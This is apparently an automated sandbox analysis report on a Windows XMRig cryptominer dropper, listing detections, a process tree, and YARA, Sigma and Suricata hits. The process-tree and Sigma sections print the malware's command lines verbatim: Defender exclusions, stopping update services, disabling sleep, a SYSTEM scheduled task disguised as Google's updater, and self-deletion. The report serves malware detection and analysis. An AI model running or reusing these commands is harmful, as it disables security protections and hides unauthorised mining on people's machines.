Edit tour

Windows Analysis Report
zufmUwylvo.exe

Overview

General Information

Sample name:	zufmUwylvo.exe renamed because original name is a hash value
Original sample name:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6.exe
Analysis ID:	1530000
MD5:	c526cb2c72a976831c06fc09991e20d8
SHA1:	b719c9c64a5368abf2671a0e8d6ef8902bdaf9aa
SHA256:	53ad8953df55fbe65065f3e94135a4596f6209f20947c0e3df949910ce6cbbc6
Tags:	exeuser-adrian__luca
Infos:

Detection

Xmrig

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected Xmrig cryptocurrency miner

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Found strings related to Crypto-Mining

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Performs DNS queries to domains with low reputation

Protects its processes via BreakOnTermination flag

Queries memory information (via WMI often done to detect virtual machines)

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Uses powercfg.exe to modify the power settings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

zufmUwylvo.exe (PID: 8104 cmdline: "C:\Users\user\Desktop\zufmUwylvo.exe" MD5: C526CB2C72A976831C06FC09991E20D8)

zxcvbnmasd.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)

dialer.exe (PID: 2788 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 360 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 772 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 792 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeusererSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1040 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

updater.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 413E4E7BC129E8165D1FFD2B1AE5DB04)

svchost.exe (PID: 4924 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1108 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1172 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1216 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1332 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1416 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7848 cmdline: C:\Windows\system32\WerFault.exe -u -p 8104 -s 2528 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

powershell.exe (PID: 1352 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1556 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 1956 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2044 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3324 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2068 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 2216 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 2312 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2936 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 5292 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 4508 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 7328 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 2924 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1056 cmdline: C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 6572 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Windows\Temp\jscseoeoqftm.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\jscseoeoqftm.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Windows\Temp\jscseoeoqftm.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\jscseoeoqftm.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight

Memory Dumps

Source	Rule	Description	Author	Strings
0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5153a8:$a1: mining.set_target 0x510b88:$a2: XMRIG_HOSTNAME 0x512680:$a3: Usage: xmrig [OPTIONS] 0x510b60:$a4: XMRIG_VERSION
Process Memory Space: updater.exe PID: 5804	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
Process Memory Space: updater.exe PID: 5804	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0xe7d8f:$a1: mining.set_target 0xe4951:$a2: XMRIG_HOSTNAME 0xe5506:$a3: Usage: xmrig [OPTIONS] 0xe4932:$a4: XMRIG_VERSION

Unpacked PEs

Source	Rule	Description	Author	Strings
45.2.updater.exe.14001fa80.9.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
45.2.updater.exe.14001fa80.9.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x511928:$a1: mining.set_target 0x50d108:$a2: XMRIG_HOSTNAME 0x50ec00:$a3: Usage: xmrig [OPTIONS] 0x50d0e0:$a4: XMRIG_VERSION
45.2.updater.exe.14001fa80.9.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x517901:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
45.2.updater.exe.14001fa80.9.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x517e60:$s1: %s/%s (Windows NT %lu.%lu 0x518688:$s3: \\.\WinRing0_ 0x510b88:$s4: pool_wallet 0x50c990:$s5: cryptonight 0x50c9a0:$s5: cryptonight 0x50c9b0:$s5: cryptonight 0x50c9c0:$s5: cryptonight 0x50c9d8:$s5: cryptonight 0x50c9e8:$s5: cryptonight 0x50c9f8:$s5: cryptonight 0x50ca10:$s5: cryptonight 0x50ca20:$s5: cryptonight 0x50ca38:$s5: cryptonight 0x50ca50:$s5: cryptonight 0x50ca60:$s5: cryptonight 0x50ca70:$s5: cryptonight 0x50ca80:$s5: cryptonight 0x50ca98:$s5: cryptonight 0x50cab0:$s5: cryptonight 0x50cac0:$s5: cryptonight 0x50cad0:$s5: cryptonight
45.2.updater.exe.140040c40.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
45.2.updater.exe.140040c40.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f0768:$a1: mining.set_target 0x4ebf48:$a2: XMRIG_HOSTNAME 0x4eda40:$a3: Usage: xmrig [OPTIONS] 0x4ebf20:$a4: XMRIG_VERSION
45.2.updater.exe.140040c40.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f6741:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
45.2.updater.exe.140040c40.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f6ca0:$s1: %s/%s (Windows NT %lu.%lu 0x4f74c8:$s3: \\.\WinRing0_ 0x4ef9c8:$s4: pool_wallet 0x4eb7d0:$s5: cryptonight 0x4eb7e0:$s5: cryptonight 0x4eb7f0:$s5: cryptonight 0x4eb800:$s5: cryptonight 0x4eb818:$s5: cryptonight 0x4eb828:$s5: cryptonight 0x4eb838:$s5: cryptonight 0x4eb850:$s5: cryptonight 0x4eb860:$s5: cryptonight 0x4eb878:$s5: cryptonight 0x4eb890:$s5: cryptonight 0x4eb8a0:$s5: cryptonight 0x4eb8b0:$s5: cryptonight 0x4eb8c0:$s5: cryptonight 0x4eb8d8:$s5: cryptonight 0x4eb8f0:$s5: cryptonight 0x4eb900:$s5: cryptonight 0x4eb910:$s5: cryptonight
45.2.updater.exe.140062860.8.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
45.2.updater.exe.140062860.8.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
45.2.updater.exe.140062860.8.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
45.2.updater.exe.140062860.8.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
Click to see the 7 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 1556, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 2924, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 1352, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 2788, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 1352, ProcessName: powershell.exe

Suricata Signatures

ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:16:53.523168+0200	2036289	2	Crypto Currency Mining Activity Detected	192.168.2.10	55489	1.1.1.1	53	UDP

ET MALWARE SilentCryptoMiner Agent Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-09T16:16:55.646066+0200	2054247	1	A Network Trojan was detected	104.20.4.235	443	192.168.2.10	49983	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp

Avira: detection malicious, Label: HEUR/AGEN.1362795

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe	ReversingLabs: Detection: 28%
Source: C:\Windows\Temp\jscseoeoqftm.tmp	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: zufmUwylvo.exe

ReversingLabs: Detection: 68%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp	Joe Sandbox ML: detected
Source: C:\Windows\Temp\jscseoeoqftm.tmp	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: zufmUwylvo.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: updater.exe PID: 5804, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED

Found strings related to Crypto-Mining

Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: losestratum+tcp://
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: cryptonight/0
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: losestratum+tcp://
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: C:\Program Files\Google\Chrome\updater.exe

Directory created: C:\Program Files\Google\Libs

Source: unknown

HTTPS traffic detected: 84.32.84.109:443 -> 192.168.2.10:49723 version: TLS 1.2

Source: zufmUwylvo.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC32000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERE4D.tmp.dmp.10.dr
